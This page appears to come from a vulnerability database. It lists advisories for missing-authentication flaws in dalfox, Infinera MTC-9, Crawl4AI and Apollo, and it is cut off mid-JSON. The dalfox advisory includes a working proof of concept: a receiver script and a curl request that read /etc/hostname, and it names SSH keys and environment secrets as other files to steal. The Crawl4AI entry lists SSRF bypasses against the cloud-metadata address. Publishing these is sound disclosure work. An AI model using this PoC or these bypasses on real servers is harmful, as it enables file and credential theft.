CWE-306
AllowedMissing Authentication for Critical Function
Abstraction: Base · Status: Draft
The product does not perform any authentication for functionality that requires a provable user identity or consumes a significant amount of resources.
3465 vulnerabilities reference this CWE, most recent first.
GHSA-35WR-X7V6-9FV2
Vulnerability from github – Published: 2026-05-12 15:08 – Updated: 2026-06-08 23:50Summary
When dalfox is run in REST API server mode, the custom-payload-file field in model.Options is JSON-tagged and deserialized directly from the attacker's request body, then propagated unchanged through dalfox.Initialize into the scan engine. The engine passes the value to voltFile.ReadLinesOrLiteral, which reads lines from any file path accessible to the dalfox process and embeds each line as an XSS payload in outbound HTTP requests directed at the attacker-controlled target URL. Because the server has no API key by default, an unauthenticated network attacker can exfiltrate the contents of arbitrary files on the dalfox host by reading them line-by-line through scan traffic.
Severity
High (CVSS 3.1: 7.5)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- Attack Vector: Network — server binds to
0.0.0.0:6664by default; reachable by any network peer. - Attack Complexity: Low — no preconditions beyond network access;
skip-discoveryandparamare both attacker-supplied, so the code path is fully under attacker control. - Privileges Required: None —
--api-keydefaults to"", so the auth middleware is not registered. - User Interaction: None.
- Scope: Unchanged — the file read and the outbound HTTP exfiltration request both originate from the same dalfox process authority.
- Confidentiality Impact: High — the attacker can read any file the dalfox process can open: private keys, configuration files containing database credentials, environment files,
/etc/passwd, etc. - Integrity Impact: None — this path is read-only.
- Availability Impact: None.
Affected Component
cmd/server.go—init()(line 51):--api-keydefaults to""— no auth by defaultpkg/server/server.go—setupEchoServer()(line 68): auth middleware only registered whenAPIKey != ""pkg/server/server.go—postScanHandler()(lines 173–191):rq.Options(includingCustomPayloadFile) passed toScanFromAPIwithout sanitizationlib/func.go—Initialize()(line 117):CustomPayloadFileexplicitly propagated from caller optionspkg/scanning/scan.go— anonymous block (lines 341–368):voltFile.ReadLinesOrLiteral(options.CustomPayloadFile)reads file; contents injected into outbound requests
CWE
- CWE-306: Missing Authentication for Critical Function
- CWE-73: External Control of File Name or Path
- CWE-552: Files or Directories Accessible to External Parties
Description
custom-payload-file Is Fully Attacker-Controlled
model.Options exposes CustomPayloadFile with a JSON tag:
// pkg/model/options.go:33
CustomPayloadFile string `json:"custom-payload-file,omitempty"`
postScanHandler binds the entire Req.Options from the JSON body and passes it directly to ScanFromAPI:
// pkg/server/server.go:173-191
rq := new(Req)
if err := c.Bind(rq); err != nil { ... }
go ScanFromAPI(rq.URL, rq.Options, *options, sid)
ScanFromAPI passes rqOptions as target.Options to dalfox.Initialize:
// pkg/server/scan.go:22-27
target := dalfox.Target{
URL: url,
Method: rqOptions.Method,
Options: rqOptions,
}
newOptions := dalfox.Initialize(target, target.Options)
Initialize explicitly copies CustomPayloadFile into newOptions with no filtering:
// lib/func.go:117
"CustomPayloadFile": {&newOptions.CustomPayloadFile, options.CustomPayloadFile},
File Read and Exfiltration Path
In pkg/scanning/scan.go, when the scan engine reaches the custom payload phase, it reads the attacker-specified file path:
// pkg/scanning/scan.go:341-366
if (options.SkipDiscovery || utils.IsAllowType(policy["Content-Type"])) && options.CustomPayloadFile != "" {
ff, err := voltFile.ReadLinesOrLiteral(options.CustomPayloadFile)
if err != nil {
printing.DalLog("SYSTEM", "Failed to load custom XSS payload file", options)
} else {
for _, customPayload := range ff {
if customPayload != "" {
for k, v := range params {
if optimization.CheckInspectionParam(options, k) {
...
tq, tm := optimization.MakeRequestQuery(target, k, customPayload, "inHTML"+ptype, "toAppend", encoder, options)
query[tq] = tm
}
}
}
}
}
}
Each line of the file becomes a payload value embedded in a query parameter of an HTTP request sent to the attacker-controlled target URL. performScanning then dispatches every entry in the query map via SendReq, delivering the file's contents to the attacker's server as the value of the nominated parameter (e.g., ?q=<file-line>).
Condition Is Trivially Satisfiable
The condition options.SkipDiscovery || utils.IsAllowType(policy["Content-Type"]) is satisfied by setting skip-discovery: true in the JSON request body — a field the attacker fully controls. When SkipDiscovery is true, the engine also requires at least one parameter via UniqParam (the -p flag), which the attacker supplies as param: ["q"]. The code then hardcodes policy["Content-Type"] = "text/html" and populates params["q"] automatically:
// pkg/scanning/scan.go:224-240
if len(options.UniqParam) == 0 {
return scanResult, fmt.Errorf("--skip-discovery requires parameters to be specified with -p flag")
}
for _, paramName := range options.UniqParam {
params[paramName] = model.ParamResult{
Name: paramName, Type: "URL", Reflected: true, Chars: payload.GetSpecialChar(),
}
}
policy["Content-Type"] = "text/html"
Both conditions are fully attacker-controlled through the JSON request body.
No Defense at Any Layer
The same opt-in API key guard from the first finding applies identically here:
// pkg/server/server.go:68-70
if options.ServerType == "rest" && options.APIKey != "" {
e.Use(apiKeyAuth(options.APIKey, options))
}
With the default empty API key, no middleware is installed and every endpoint is unauthenticated. There is no path sanitization, no allowlist, and no IsAPI guard around the CustomPayloadFile read.
Proof of Concept
# Step 1 — Attacker-controlled receiver (logs q= parameter to stdout)
python3 - <<'PY'
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse, parse_qs
class H(BaseHTTPRequestHandler):
def do_GET(self):
q = parse_qs(urlparse(self.path).query).get('q', [''])[0]
print("[RECEIVED] q =", q, flush=True)
body = b'<html><body>ok</body></html>'
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.send_header('Content-Length', str(len(body)))
self.end_headers()
self.wfile.write(body)
def log_message(self, *a): pass
HTTPServer(('127.0.0.1', 18081), H).serve_forever()
PY
# Step 2 — Start dalfox REST server (default: no API key)
go run . server --host 127.0.0.1 --port 16664 --type rest
# Step 3 — Exfiltrate /etc/hostname (or any file readable by the dalfox process)
curl -s -X POST http://127.0.0.1:16664/scan \
-H 'Content-Type: application/json' \
--data '{
"url": "http://127.0.0.1:18081/?q=test",
"options": {
"custom-payload-file": "/etc/hostname",
"only-custom-payload": true,
"skip-discovery": true,
"param": ["q"],
"use-headless": false,
"worker": 1
}
}'
# Expected output on the receiver (Step 1 terminal):
# [RECEIVED] q = myhostname.local
# For multi-line files (e.g. /etc/passwd), each line arrives as a separate request
No X-API-KEY header is required. Replace /etc/hostname with any file path accessible to the dalfox process (e.g., ~/.ssh/id_rsa, /run/secrets/db_password, /proc/self/environ).
Impact
- Arbitrary file read on the dalfox host: any file readable by the dalfox process (SSH private keys, TLS certificates,
.envfiles, cloud credential files,/proc/self/environ) can be exfiltrated one line at a time. - No authentication required under the default configuration.
- The exfiltration channel is the dalfox host's own outbound HTTP scan traffic — no inbound connection from the attacker to the dalfox host is needed beyond the initial REST API call.
- Combined with the
found-actionRCE finding (separate issue), an attacker could first read/proc/self/environto harvest secrets, then execute commands.
Recommended Remediation
Option 1: Strip filesystem-dangerous fields from API-sourced requests (preferred)
Apply a denylist of fields that should never be accepted from the REST API, regardless of auth state. This protects authenticated deployments against credential-theft or privilege escalation by external API consumers:
// pkg/server/server.go — in postScanHandler, before ScanFromAPI:
rq.Options.CustomPayloadFile = ""
rq.Options.CustomBlindXSSPayloadFile = ""
rq.Options.FoundAction = ""
rq.Options.FoundActionShell = ""
rq.Options.OutputFile = ""
rq.Options.HarFilePath = ""
Option 2: Require --api-key at server startup
Make authentication mandatory and refuse to start without it:
// cmd/server.go — in runServerCmd:
if serverType == "rest" && apiKey == "" {
fmt.Fprintln(os.Stderr, "ERROR: --api-key is required when running in REST server mode.")
os.Exit(1)
}
Both options should be applied together. Option 2 prevents unauthenticated access to the API entirely; Option 1 ensures that even trusted API callers cannot leverage the server to read files from the host filesystem.
Credit
Emmanuel David
Github:- https://github.com/drmingler
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 2.12.0"
},
"package": {
"ecosystem": "Go",
"name": "github.com/hahwul/dalfox/v2"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.13.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-45088"
],
"database_specific": {
"cwe_ids": [
"CWE-306",
"CWE-552",
"CWE-73"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-12T15:08:13Z",
"nvd_published_at": "2026-05-27T18:16:24Z",
"severity": "HIGH"
},
"details": "## Summary\n\nWhen dalfox is run in REST API server mode, the `custom-payload-file` field in `model.Options` is JSON-tagged and deserialized directly from the attacker\u0027s request body, then propagated unchanged through `dalfox.Initialize` into the scan engine. The engine passes the value to `voltFile.ReadLinesOrLiteral`, which reads lines from any file path accessible to the dalfox process and embeds each line as an XSS payload in outbound HTTP requests directed at the attacker-controlled target URL. Because the server has no API key by default, an unauthenticated network attacker can exfiltrate the contents of arbitrary files on the dalfox host by reading them line-by-line through scan traffic.\n\n## Severity\n\n**High** (CVSS 3.1: 7.5)\n\n`CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N`\n\n- **Attack Vector:** Network \u2014 server binds to `0.0.0.0:6664` by default; reachable by any network peer.\n- **Attack Complexity:** Low \u2014 no preconditions beyond network access; `skip-discovery` and `param` are both attacker-supplied, so the code path is fully under attacker control.\n- **Privileges Required:** None \u2014 `--api-key` defaults to `\"\"`, so the auth middleware is not registered.\n- **User Interaction:** None.\n- **Scope:** Unchanged \u2014 the file read and the outbound HTTP exfiltration request both originate from the same dalfox process authority.\n- **Confidentiality Impact:** High \u2014 the attacker can read any file the dalfox process can open: private keys, configuration files containing database credentials, environment files, `/etc/passwd`, etc.\n- **Integrity Impact:** None \u2014 this path is read-only.\n- **Availability Impact:** None.\n\n## Affected Component\n\n- `cmd/server.go` \u2014 `init()` (line 51): `--api-key` defaults to `\"\"` \u2014 no auth by default\n- `pkg/server/server.go` \u2014 `setupEchoServer()` (line 68): auth middleware only registered when `APIKey != \"\"`\n- `pkg/server/server.go` \u2014 `postScanHandler()` (lines 173\u2013191): `rq.Options` (including `CustomPayloadFile`) passed to `ScanFromAPI` without sanitization\n- `lib/func.go` \u2014 `Initialize()` (line 117): `CustomPayloadFile` explicitly propagated from caller options\n- `pkg/scanning/scan.go` \u2014 anonymous block (lines 341\u2013368): `voltFile.ReadLinesOrLiteral(options.CustomPayloadFile)` reads file; contents injected into outbound requests\n\n## CWE\n\n- **CWE-306**: Missing Authentication for Critical Function\n- **CWE-73**: External Control of File Name or Path\n- **CWE-552**: Files or Directories Accessible to External Parties\n\n## Description\n\n### `custom-payload-file` Is Fully Attacker-Controlled\n\n`model.Options` exposes `CustomPayloadFile` with a JSON tag:\n\n```go\n// pkg/model/options.go:33\nCustomPayloadFile string `json:\"custom-payload-file,omitempty\"`\n```\n\n`postScanHandler` binds the entire `Req.Options` from the JSON body and passes it directly to `ScanFromAPI`:\n\n```go\n// pkg/server/server.go:173-191\nrq := new(Req)\nif err := c.Bind(rq); err != nil { ... }\ngo ScanFromAPI(rq.URL, rq.Options, *options, sid)\n```\n\n`ScanFromAPI` passes `rqOptions` as `target.Options` to `dalfox.Initialize`:\n\n```go\n// pkg/server/scan.go:22-27\ntarget := dalfox.Target{\n URL: url,\n Method: rqOptions.Method,\n Options: rqOptions,\n}\nnewOptions := dalfox.Initialize(target, target.Options)\n```\n\n`Initialize` explicitly copies `CustomPayloadFile` into `newOptions` with no filtering:\n\n```go\n// lib/func.go:117\n\"CustomPayloadFile\": {\u0026newOptions.CustomPayloadFile, options.CustomPayloadFile},\n```\n\n### File Read and Exfiltration Path\n\nIn `pkg/scanning/scan.go`, when the scan engine reaches the custom payload phase, it reads the attacker-specified file path:\n\n```go\n// pkg/scanning/scan.go:341-366\nif (options.SkipDiscovery || utils.IsAllowType(policy[\"Content-Type\"])) \u0026\u0026 options.CustomPayloadFile != \"\" {\n ff, err := voltFile.ReadLinesOrLiteral(options.CustomPayloadFile)\n if err != nil {\n printing.DalLog(\"SYSTEM\", \"Failed to load custom XSS payload file\", options)\n } else {\n for _, customPayload := range ff {\n if customPayload != \"\" {\n for k, v := range params {\n if optimization.CheckInspectionParam(options, k) {\n ...\n tq, tm := optimization.MakeRequestQuery(target, k, customPayload, \"inHTML\"+ptype, \"toAppend\", encoder, options)\n query[tq] = tm\n }\n }\n }\n }\n }\n}\n```\n\nEach line of the file becomes a payload value embedded in a query parameter of an HTTP request sent to the attacker-controlled target URL. `performScanning` then dispatches every entry in the `query` map via `SendReq`, delivering the file\u0027s contents to the attacker\u0027s server as the value of the nominated parameter (e.g., `?q=\u003cfile-line\u003e`).\n\n### Condition Is Trivially Satisfiable\n\nThe condition `options.SkipDiscovery || utils.IsAllowType(policy[\"Content-Type\"])` is satisfied by setting `skip-discovery: true` in the JSON request body \u2014 a field the attacker fully controls. When `SkipDiscovery` is true, the engine also requires at least one parameter via `UniqParam` (the `-p` flag), which the attacker supplies as `param: [\"q\"]`. The code then hardcodes `policy[\"Content-Type\"] = \"text/html\"` and populates `params[\"q\"]` automatically:\n\n```go\n// pkg/scanning/scan.go:224-240\nif len(options.UniqParam) == 0 {\n return scanResult, fmt.Errorf(\"--skip-discovery requires parameters to be specified with -p flag\")\n}\nfor _, paramName := range options.UniqParam {\n params[paramName] = model.ParamResult{\n Name: paramName, Type: \"URL\", Reflected: true, Chars: payload.GetSpecialChar(),\n }\n}\npolicy[\"Content-Type\"] = \"text/html\"\n```\n\nBoth conditions are fully attacker-controlled through the JSON request body.\n\n### No Defense at Any Layer\n\nThe same opt-in API key guard from the first finding applies identically here:\n\n```go\n// pkg/server/server.go:68-70\nif options.ServerType == \"rest\" \u0026\u0026 options.APIKey != \"\" {\n e.Use(apiKeyAuth(options.APIKey, options))\n}\n```\n\nWith the default empty API key, no middleware is installed and every endpoint is unauthenticated. There is no path sanitization, no allowlist, and no `IsAPI` guard around the `CustomPayloadFile` read.\n\n## Proof of Concept\n\n```bash\n# Step 1 \u2014 Attacker-controlled receiver (logs q= parameter to stdout)\npython3 - \u003c\u003c\u0027PY\u0027\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\nfrom urllib.parse import urlparse, parse_qs\nclass H(BaseHTTPRequestHandler):\n def do_GET(self):\n q = parse_qs(urlparse(self.path).query).get(\u0027q\u0027, [\u0027\u0027])[0]\n print(\"[RECEIVED] q =\", q, flush=True)\n body = b\u0027\u003chtml\u003e\u003cbody\u003eok\u003c/body\u003e\u003c/html\u003e\u0027\n self.send_response(200)\n self.send_header(\u0027Content-Type\u0027, \u0027text/html\u0027)\n self.send_header(\u0027Content-Length\u0027, str(len(body)))\n self.end_headers()\n self.wfile.write(body)\n def log_message(self, *a): pass\nHTTPServer((\u0027127.0.0.1\u0027, 18081), H).serve_forever()\nPY\n\n# Step 2 \u2014 Start dalfox REST server (default: no API key)\ngo run . server --host 127.0.0.1 --port 16664 --type rest\n\n# Step 3 \u2014 Exfiltrate /etc/hostname (or any file readable by the dalfox process)\ncurl -s -X POST http://127.0.0.1:16664/scan \\\n -H \u0027Content-Type: application/json\u0027 \\\n --data \u0027{\n \"url\": \"http://127.0.0.1:18081/?q=test\",\n \"options\": {\n \"custom-payload-file\": \"/etc/hostname\",\n \"only-custom-payload\": true,\n \"skip-discovery\": true,\n \"param\": [\"q\"],\n \"use-headless\": false,\n \"worker\": 1\n }\n }\u0027\n\n# Expected output on the receiver (Step 1 terminal):\n# [RECEIVED] q = myhostname.local\n\n# For multi-line files (e.g. /etc/passwd), each line arrives as a separate request\n```\n\nNo `X-API-KEY` header is required. Replace `/etc/hostname` with any file path accessible to the dalfox process (e.g., `~/.ssh/id_rsa`, `/run/secrets/db_password`, `/proc/self/environ`).\n\n## Impact\n\n- **Arbitrary file read** on the dalfox host: any file readable by the dalfox process (SSH private keys, TLS certificates, `.env` files, cloud credential files, `/proc/self/environ`) can be exfiltrated one line at a time.\n- **No authentication required** under the default configuration.\n- The exfiltration channel is the dalfox host\u0027s own outbound HTTP scan traffic \u2014 no inbound connection from the attacker to the dalfox host is needed beyond the initial REST API call.\n- Combined with the `found-action` RCE finding (separate issue), an attacker could first read `/proc/self/environ` to harvest secrets, then execute commands.\n\n## Recommended Remediation\n\n### Option 1: Strip filesystem-dangerous fields from API-sourced requests (preferred)\n\nApply a denylist of fields that should never be accepted from the REST API, regardless of auth state. This protects authenticated deployments against credential-theft or privilege escalation by external API consumers:\n\n```go\n// pkg/server/server.go \u2014 in postScanHandler, before ScanFromAPI:\nrq.Options.CustomPayloadFile = \"\"\nrq.Options.CustomBlindXSSPayloadFile = \"\"\nrq.Options.FoundAction = \"\"\nrq.Options.FoundActionShell = \"\"\nrq.Options.OutputFile = \"\"\nrq.Options.HarFilePath = \"\"\n```\n\n### Option 2: Require `--api-key` at server startup\n\nMake authentication mandatory and refuse to start without it:\n\n```go\n// cmd/server.go \u2014 in runServerCmd:\nif serverType == \"rest\" \u0026\u0026 apiKey == \"\" {\n fmt.Fprintln(os.Stderr, \"ERROR: --api-key is required when running in REST server mode.\")\n os.Exit(1)\n}\n```\n\nBoth options should be applied together. Option 2 prevents unauthenticated access to the API entirely; Option 1 ensures that even trusted API callers cannot leverage the server to read files from the host filesystem.\n\n##Credit\n\nEmmanuel David\n\nGithub:- https://github.com/drmingler",
"id": "GHSA-35wr-x7v6-9fv2",
"modified": "2026-06-08T23:50:09Z",
"published": "2026-05-12T15:08:13Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/hahwul/dalfox/security/advisories/GHSA-35wr-x7v6-9fv2"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45088"
},
{
"type": "PACKAGE",
"url": "https://github.com/hahwul/dalfox"
},
{
"type": "WEB",
"url": "https://github.com/hahwul/dalfox/releases/tag/v2.13.0"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "Dalfox Server Mode has an Unauthenticated Arbitrary File Read with Out-of-Band Exfiltration via `custom-payload-file`"
}
GHSA-3645-F6QV-W99W
Vulnerability from github – Published: 2025-12-08 12:30 – Updated: 2025-12-08 12:30Improper configuration of the SSH service in Infinera MTC-9 allows an unauthenticated attacker to execute arbitrary commands and access data on file system
.
This issue affects MTC-9: from R22.1.1.0275 before R23.0.
{
"affected": [],
"aliases": [
"CVE-2025-27020"
],
"database_specific": {
"cwe_ids": [
"CWE-306"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-12-08T10:16:01Z",
"severity": "CRITICAL"
},
"details": "Improper configuration of the SSH service in Infinera MTC-9 allows an unauthenticated attacker to execute arbitrary commands and access data on file system\n\n.\n\n\nThis issue affects MTC-9: from R22.1.1.0275 before R23.0.",
"id": "GHSA-3645-f6qv-w99w",
"modified": "2025-12-08T12:30:25Z",
"published": "2025-12-08T12:30:25Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-27020"
},
{
"type": "WEB",
"url": "https://www.cvcn.gov.it/cvcn/cve/CVE-2025-27020"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-365W-HQF6-VXFG
Vulnerability from github – Published: 2026-06-16 20:13 – Updated: 2026-06-24 13:05Summary
Multiple security vulnerabilities in the Crawl4AI Docker API server affecting endpoints for crawling, markdown/LLM extraction, screenshots, PDFs, webhooks, monitoring, JavaScript execution, and configuration.
Vulnerabilities
1. Arbitrary File Write via /screenshot and /pdf (CWE-22, CVSS 9.1)
The output_path parameter accepts arbitrary filesystem paths with no validation. An attacker can overwrite server files (DoS) or write to any appuser-writable location.
Fix: Added validate_output_path() restricting writes to CRAWL4AI_OUTPUT_DIR (/tmp/crawl4ai-outputs by default). Added Pydantic field_validator rejecting .. traversal sequences.
2. SSRF via Webhook URL (CWE-918, CVSS 8.6)
Webhook URLs in /crawl/job and /llm/job accept internal/private IPs with no validation, enabling Server-Side Request Forgery against cloud metadata endpoints (169.254.169.254), internal services, and Docker networks.
Fix: Added validate_webhook_url() with blocklist for RFC 1918, loopback, link-local, cloud metadata IPs and hostnames. Validation at both job submission and send time. Explicit follow_redirects=False.
3. Authentication Bypass on Monitor Endpoints (CWE-306, CVSS 6.5)
The monitor router was mounted without token_dep dependency, making all monitoring endpoints (including destructive ones like /monitor/actions/cleanup) accessible without authentication.
Fix: Added dependencies=[Depends(token_dep)] to monitor router. Added explicit token check on WebSocket /monitor/ws endpoint.
4. Stored XSS in Monitor Dashboard (CWE-79, CVSS 6.1)
URLs and error messages rendered in the monitor dashboard via innerHTML without escaping, enabling stored XSS via crafted crawl URLs.
Fix: Server-side html.escape() on URL and error storage. Client-side escapeHtml() wrapper on all innerHTML template injections.
5. Arbitrary JavaScript Execution via /execute_js (CWE-94, CVSS 8.1)
The /execute_js endpoint accepts and executes arbitrary JavaScript in the server's browser with --disable-web-security enabled, combining arbitrary JS execution with SSRF capability.
Fix: Disabled by default via CRAWL4AI_EXECUTE_JS_ENABLED env var. Added SSRF blocklist on destination URL. Removed --disable-web-security from default browser args.
6. Hardcoded JWT Secret Key (CWE-798, CVSS 9.8)
The JWT signing key defaults to "mysecret" in the public source code, allowing anyone to forge valid authentication tokens.
Fix: Removed default value. Added startup validation rejecting weak/short secrets. Auto-generates ephemeral key when JWT enabled but no key set.
7. SSRF via Direct Crawl Endpoints /crawl, /md, /llm (CWE-918, CVSS 8.6)
The primary crawl entry points (/crawl, /crawl/stream, /md, /llm) fetch arbitrary user-supplied URLs with no destination validation, enabling Server-Side Request Forgery against internal services, Docker networks, and cloud metadata endpoints (169.254.169.254). A blocklist that only inspects the literal hostname is additionally bypassable via IPv6-mapped IPv4 addresses (e.g. [::ffff:169.254.169.254], [::ffff:10.0.0.1]), which resolve to the blocked private/metadata ranges but evade a naive string check.
Fix: Added URL destination validation on all crawl/md/llm entry points, reusing the SSRF blocklist (RFC 1918, loopback, link-local, cloud-metadata IPs and hostnames). IPv6-mapped IPv4 addresses are normalized to their IPv4 form before the blocklist check, closing the mapping bypass. raw:// URLs are skipped. Validation applies at request entry, not only at fetch time.
Workarounds
- Upgrade to the patched version (recommended)
- Set
CRAWL4AI_API_TOKENto enable authentication - Set a strong
SECRET_KEY(min 32 chars) if using JWT - Restrict network access to the Docker API
Credits
- Jeongbean Jeon - file write, SSRF, monitor auth bypass, stored XSS
- wulonchia - file write via output_path (independent report)
- by111 (August829) - hardcoded JWT, eval in /config/dump, /execute_js, hook sandbox escape
- secsys_codex - SSRF via /md, /crawl, /llm endpoints + IPv6-mapped IPv4 bypass (URL destination validation)
- Velayutham Selvaraj (LinkedIn) - SSRF via missing host validation in validate_url_scheme (independent report)
- IcySun & Yashon - SSRF, arbitrary file write, missing-auth-by-default, hook sandbox bypass via asyncio (independent report)
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 0.8.6"
},
"package": {
"ecosystem": "PyPI",
"name": "crawl4ai"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.8.7"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-56266"
],
"database_specific": {
"cwe_ids": [
"CWE-22",
"CWE-306",
"CWE-79",
"CWE-798",
"CWE-918",
"CWE-94"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-16T20:13:30Z",
"nvd_published_at": "2026-06-22T22:16:50Z",
"severity": "CRITICAL"
},
"details": "### Summary\n\nMultiple security vulnerabilities in the Crawl4AI Docker API server affecting endpoints for crawling, markdown/LLM extraction, screenshots, PDFs, webhooks, monitoring, JavaScript execution, and configuration.\n\n### Vulnerabilities\n\n#### 1. Arbitrary File Write via /screenshot and /pdf (CWE-22, CVSS 9.1)\n\nThe `output_path` parameter accepts arbitrary filesystem paths with no validation. An attacker can overwrite server files (DoS) or write to any appuser-writable location.\n\n**Fix:** Added `validate_output_path()` restricting writes to `CRAWL4AI_OUTPUT_DIR` (/tmp/crawl4ai-outputs by default). Added Pydantic `field_validator` rejecting `..` traversal sequences.\n\n#### 2. SSRF via Webhook URL (CWE-918, CVSS 8.6)\n\nWebhook URLs in `/crawl/job` and `/llm/job` accept internal/private IPs with no validation, enabling Server-Side Request Forgery against cloud metadata endpoints (169.254.169.254), internal services, and Docker networks.\n\n**Fix:** Added `validate_webhook_url()` with blocklist for RFC 1918, loopback, link-local, cloud metadata IPs and hostnames. Validation at both job submission and send time. Explicit `follow_redirects=False`.\n\n#### 3. Authentication Bypass on Monitor Endpoints (CWE-306, CVSS 6.5)\n\nThe monitor router was mounted without `token_dep` dependency, making all monitoring endpoints (including destructive ones like `/monitor/actions/cleanup`) accessible without authentication.\n\n**Fix:** Added `dependencies=[Depends(token_dep)]` to monitor router. Added explicit token check on WebSocket `/monitor/ws` endpoint.\n\n#### 4. Stored XSS in Monitor Dashboard (CWE-79, CVSS 6.1)\n\nURLs and error messages rendered in the monitor dashboard via `innerHTML` without escaping, enabling stored XSS via crafted crawl URLs.\n\n**Fix:** Server-side `html.escape()` on URL and error storage. Client-side `escapeHtml()` wrapper on all `innerHTML` template injections.\n\n#### 5. Arbitrary JavaScript Execution via /execute_js (CWE-94, CVSS 8.1)\n\nThe `/execute_js` endpoint accepts and executes arbitrary JavaScript in the server\u0027s browser with `--disable-web-security` enabled, combining arbitrary JS execution with SSRF capability.\n\n**Fix:** Disabled by default via `CRAWL4AI_EXECUTE_JS_ENABLED` env var. Added SSRF blocklist on destination URL. Removed `--disable-web-security` from default browser args.\n\n#### 6. Hardcoded JWT Secret Key (CWE-798, CVSS 9.8)\n\nThe JWT signing key defaults to `\"mysecret\"` in the public source code, allowing anyone to forge valid authentication tokens.\n\n**Fix:** Removed default value. Added startup validation rejecting weak/short secrets. Auto-generates ephemeral key when JWT enabled but no key set.\n\n#### 7. SSRF via Direct Crawl Endpoints /crawl, /md, /llm (CWE-918, CVSS 8.6)\n\nThe primary crawl entry points (`/crawl`, `/crawl/stream`, `/md`, `/llm`) fetch arbitrary user-supplied URLs with no destination validation, enabling Server-Side Request Forgery against internal services, Docker networks, and cloud metadata endpoints (169.254.169.254). A blocklist that only inspects the literal hostname is additionally bypassable via IPv6-mapped IPv4 addresses (e.g. `[::ffff:169.254.169.254]`, `[::ffff:10.0.0.1]`), which resolve to the blocked private/metadata ranges but evade a naive string check.\n\n**Fix:** Added URL destination validation on all crawl/md/llm entry points, reusing the SSRF blocklist (RFC 1918, loopback, link-local, cloud-metadata IPs and hostnames). IPv6-mapped IPv4 addresses are normalized to their IPv4 form before the blocklist check, closing the mapping bypass. `raw://` URLs are skipped. Validation applies at request entry, not only at fetch time.\n\n### Workarounds\n\n1. Upgrade to the patched version (recommended)\n2. Set `CRAWL4AI_API_TOKEN` to enable authentication\n3. Set a strong `SECRET_KEY` (min 32 chars) if using JWT\n4. Restrict network access to the Docker API\n\n### Credits\n\n- Jeongbean Jeon - file write, SSRF, monitor auth bypass, stored XSS\n- wulonchia - file write via output_path (independent report)\n- by111 ([August829](https://github.com/August829)) - hardcoded JWT, eval in /config/dump, /execute_js, hook sandbox escape\n- secsys_codex - SSRF via /md, /crawl, /llm endpoints + IPv6-mapped IPv4 bypass (URL destination validation)\n- Velayutham Selvaraj ([LinkedIn](https://www.linkedin.com/in/velayuthamselvaraj)) - SSRF via missing host validation in validate_url_scheme (independent report)\n- IcySun \u0026 Yashon - SSRF, arbitrary file write, missing-auth-by-default, hook sandbox bypass via asyncio (independent report)",
"id": "GHSA-365w-hqf6-vxfg",
"modified": "2026-06-24T13:05:44Z",
"published": "2026-06-16T20:13:30Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/unclecode/crawl4ai/security/advisories/GHSA-365w-hqf6-vxfg"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56266"
},
{
"type": "PACKAGE",
"url": "https://github.com/unclecode/crawl4ai"
},
{
"type": "WEB",
"url": "https://www.vulncheck.com/advisories/crawl4ai-server-side-request-forgery-via-direct-crawl-endpoints"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
],
"summary": "Crawl4AI: Multiple Docker API Vulnerabilities - File Write, SSRF, Auth Bypass, XSS, JS Execution"
}
GHSA-368X-WMMG-HQ5C
Vulnerability from github – Published: 2023-02-22 21:58 – Updated: 2026-06-08 23:55Impact
If users expose the apollo-configservice to the internet(which is not recommended), there are potential security issues since there is no authentication feature enabled for the built-in eureka service. Malicious hackers may access eureka directly to mock apollo-configservice and apollo-adminservice .
Patches
Login authentication for eureka was added in https://github.com/apolloconfig/apollo/pull/4663 and was released in v2.1.0.
Workarounds
To fix the potential issue without upgrading, simply follow the advice that does not expose apollo-configservice to the internet.
References
For more information
If you have any questions or comments about this advisory: * Open an issue in issue * Email us at apollo-config@googlegroups.com
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "com.ctrip.framework.apollo:apollo"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.1.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2023-25570"
],
"database_specific": {
"cwe_ids": [
"CWE-306"
],
"github_reviewed": true,
"github_reviewed_at": "2023-02-22T21:58:33Z",
"nvd_published_at": "2023-02-20T16:15:00Z",
"severity": "HIGH"
},
